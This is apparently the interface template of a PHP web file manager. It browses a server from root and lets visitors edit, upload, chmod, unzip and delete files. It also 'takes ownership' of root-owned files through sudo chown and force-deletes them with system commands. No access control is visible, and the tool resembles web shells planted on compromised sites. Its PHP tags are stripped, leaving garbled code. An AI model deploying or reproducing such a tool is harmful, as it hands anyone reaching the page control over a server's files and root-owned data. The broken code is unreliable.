| <span style="color:#f88;">⚠️ Shell commands disabled</span>
else:
| <span style="color:#8f8;">✓ Shell commands available</span>
endif;
</div>


<div class="toolbar">
<a href="?create_folder&path= echo urlencode($real_path); " class="btn">
+ Create Folder
</a>
<a href="?create_file&path= echo urlencode($real_path); " class="btn">
+ Create File
</a>
<a href="?upload_file&path= echo urlencode($real_path); " class="btn">
↑ Upload File
</a>
if (function_exists('shell_exec')):
<a href="?take_ownership_recursive= echo urlencode($real_path); &path= echo urlencode($real_path); "
class="btn btn-owner"
onclick="return confirm('Take ownership of ALL files in this directory?\n\nThis will change ownership recursively to echo getWebServerUser(); .\nRequires sudo permissions.')">
🛠️ Take Ownership All
</a>
endif;
<a href=" echo $_SERVER['PHP_SELF']; " class="btn">
↻ Refresh
</a>
</div>


<div class="breadcrumb">
<a href=" echo $_SERVER['PHP_SELF']; ">root</a>

$paths = explode(DIRECTORY_SEPARATOR, $real_path);
$current_path = '';
foreach ($paths as $i => $segment) {
if ($segment === '') continue;
$current_path .= ($i > 0 ? DIRECTORY_SEPARATOR : '') . $segment;
echo ' / ';
echo '<a href="' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current_path) . '">';
echo htmlspecialchars($segment);
echo '</a>';
}

</div>


if (isset($delete_success)):
<div class="message message-success">✅ echo htmlspecialchars($delete_success); </div>
elseif (isset($delete_error)):
<div class="message message-error">❌ echo htmlspecialchars($delete_error); </div>
endif;

if (isset($chmod_success)):
<div class="message message-success">✅ echo htmlspecialchars($chmod_success); </div>
elseif (isset($chmod_error)):
<div class="message message-error">❌ echo htmlspecialchars($chmod_error); </div>
endif;

if (isset($ownership_success)):
<div class="message message-success">✅ echo htmlspecialchars($ownership_success); </div>
elseif (isset($ownership_error)):
<div class="message message-error">❌ echo htmlspecialchars($ownership_error); </div>
endif;

if (isset($unzip_success)):
<div class="message message-success">✅ echo htmlspecialchars($unzip_success); </div>
elseif (isset($unzip_error)):
<div class="message message-error">❌ echo htmlspecialchars($unzip_error); </div>
endif;


<div class="file-list">
<div class="file-list-header">
<div class="file-icon">Type</div>
<div class="file-name">Name</div>
<div class="file-permissions">Permissions / Owner</div>
<div class="file-actions">Actions</div>
</div>


if (dirname($real_path) !== $real_path):
<div class="file-item">
<div class="file-icon">[↑]</div>
<div class="file-name">
<a href=" echo $_SERVER['PHP_SELF'] . '?path=' . urlencode(dirname($real_path)); ">
Parent Directory
</a>
</div>
<div class="file-permissions">-</div>
<div class="file-actions"></div>
</div>
endif;


foreach ($items as $item):

$full_path = $real_path . DIRECTORY_SEPARATOR . $item;
$is_dir = is_dir($full_path);
$is_file = is_file($full_path);
$is_zip = $is_file && strtolower(pathinfo($full_path, PATHINFO_EXTENSION)) === 'zip';
$size = $is_file ? filesize($full_path) : 0;
$modified = date('Y-m-d H:i:s', filemtime($full_path));
$permissions = getCurrentPermissions($full_path);
$owner_info = getFileOwnerInfo($full_path);
$is_root_owned = ($owner_info['owner'] == 'root' || $owner_info['uid'] == 0);
$web_user = getWebServerUser();
$is_writable = is_writable($full_path);

// Determine permission badge class
$perm_class = 'perm-other';
if ($permissions == '0777') $perm_class = 'perm-777';
elseif ($permissions == '0755') $perm_class = 'perm-755';
elseif ($permissions == '0644') $perm_class = 'perm-644';
elseif ($permissions == '0600') $perm_class = 'perm-600';
if ($is_root_owned) $perm_class = 'perm-root';

<div class="file-item echo $is_root_owned ? 'root-owned' : ''; ">
<div class="file-icon">
echo $is_dir ? '[DIR]' : ($is_zip ? '[ZIP]' : '[FILE]');
if ($is_root_owned):

<small style="color:#f00; font-size:10px;">👑</small>
endif;
</div>
<div class="file-name">
if ($is_dir):
<a href=" echo $_SERVER['PHP_SELF'] . '?path=' . urlencode($full_path); ">
echo htmlspecialchars($item); /
</a>
else:
<a href="?edit_file= echo urlencode($full_path); ">
echo htmlspecialchars($item);
</a>
endif;

<small style="color: #666;">
if ($is_file):
echo number_format($size); bytes
endif;
| Modified: echo $modified;
</small>
if ($is_root_owned):
<div class="root-warning">
👑 Root owned (UID: echo $owner_info['uid']; )
</div>
elseif (!$is_writable):
<div class="root-warning">
🔒 Not writable by echo $web_user;
</div>
endif;
<div class="server-info">
Web Server: echo $web_user; (UID: echo function_exists('posix_geteuid') ? posix_geteuid() : '?'; )
</div>
</div>
<div class="file-permissions">
<span class="perm-badge echo $perm_class; ">
echo $permissions;
</span>

// Convert permissions to symbolic notation
$symbolic = '';
if ($permissions) {
$perms = octdec($permissions);
$symbolic = '';
$symbolic .= ($perms & 0x0100) ? 'r' : '-';
$symbolic .= ($perms & 0x0080) ? 'w' : '-';
$symbolic .= ($perms & 0x0040) ? 'x' : '-';
$symbolic .= ($perms & 0x0020) ? 'r' : '-';
$symbolic .= ($perms & 0x0010) ? 'w' : '-';
$symbolic .= ($perms & 0x0008) ? 'x' : '-';
$symbolic .= ($perms & 0x0004) ? 'r' : '-';
$symbolic .= ($perms & 0x0002) ? 'w' : '-';
$symbolic .= ($perms & 0x0001) ? 'x' : '-';
}

echo $symbolic;

<small style="color: echo $is_root_owned ? '#f88' : '#8f8'; ;">
👤 echo $owner_info['owner']; : echo $owner_info['group'];
</small>
</div>
<div class="file-actions">
if ($is_writable):
<a href="?rename= echo urlencode($full_path); &path= echo urlencode($real_path); "
class="btn btn-sm" title="Rename">
Rename
</a>
endif;

<a href="?chmod= echo urlencode($full_path); &path= echo urlencode($real_path); "
class="btn btn-sm btn-warning"
title="Change Permissions">
Chmod
</a>

if ($is_root_owned && function_exists('shell_exec')):
<a href="?take_ownership= echo urlencode($full_path); &path= echo urlencode($real_path); "
class="btn btn-sm btn-owner"
title="Take Ownership from root"
onclick="return confirm('Change ownership from root to echo $web_user; ?\n\nThis will use sudo chown command.\nRequires sudo permissions.')">
Take Ownership
</a>
endif;

if ($is_zip):
<a href="?unzip= echo urlencode($full_path); "
class="btn btn-sm btn-success"
title="Extract ZIP"
onclick="return confirm('Extract echo htmlspecialchars($item); ?')">
Unzip
</a>
endif;

if ($is_root_owned):
<a href="?force_delete= echo urlencode($full_path); "
class="btn btn-sm btn-danger"
title="Force Delete (Root files)"
onclick="return confirm('⚠️ FORCE DELETE echo htmlspecialchars($item); ?\n\nThis is a root-owned file. Force delete will use system commands.\nMay not work on system-protected files.')">
Force Delete
</a>
else:
<a href="?delete= echo urlencode($full_path); "
class="btn btn-sm btn-danger"
title="Delete"
onclick="return confirm('Delete echo htmlspecialchars($item); ?')">
Delete
</a>
endif;
</div>
</div>
endforeach;

if (empty($items) && dirname($real_path) === $real_path):
<div class="file-item" style="text-align: center; padding: 30px; color: #666;">
Directory is empty
</div>
endif;
</div>


<div class="stats">

$file_count = 0;
$dir_count = 0;
$zip_count = 0;
$root_count = 0;
$total_size = 0;

foreach ($items as $item) {
$full_path = $real_path . DIRECTORY_SEPARATOR . $item;
if (is_dir($full_path)) {
$dir_count++;
} else {
$file_count++;
$total_size += filesize($full_path);
if (strtolower(pathinfo($full_path, PATHINFO_EXTENSION)) === 'zip') {
$zip_count++;
}
}

$owner_info = getFileOwnerInfo($full_path);
if ($owner_info['owner'] == 'root' || $owner_info['uid'] == 0) {
$root_count++;
}
}

<strong>📊 Statistics:</strong>

Total: echo count($items); item(s)
( echo $dir_count; folders, echo $file_count; files echo $zip_count > 0 ? ', ' . $zip_count . ' zip files' : ''; )

Ownership: if ($root_count > 0): <span style="color:#f88;"> echo $root_count; root-owned files</span> | endif;
Web Server: <strong> echo $web_user; </strong> (UID: echo function_exists('posix_geteuid') ? posix_geteuid() : '?'; )

Total Size: echo number_format($total_size / 1024, 2); KB |
Location: echo htmlspecialchars($real_path); |
Disk free: echo number_format(disk_free_space($real_path) / (1024*1024), 2); MB
</div>
</div>

<script>
// Highlight root-owned files
document.addEventListener('DOMContentLoaded', function() {
var rootFiles = document.querySelectorAll('.file-item.root-owned');
if (rootFiles.length > 0) {
console.log('Found ' + rootFiles.length + ' root-owned file(s). Consider taking ownership.');
}
});
</script>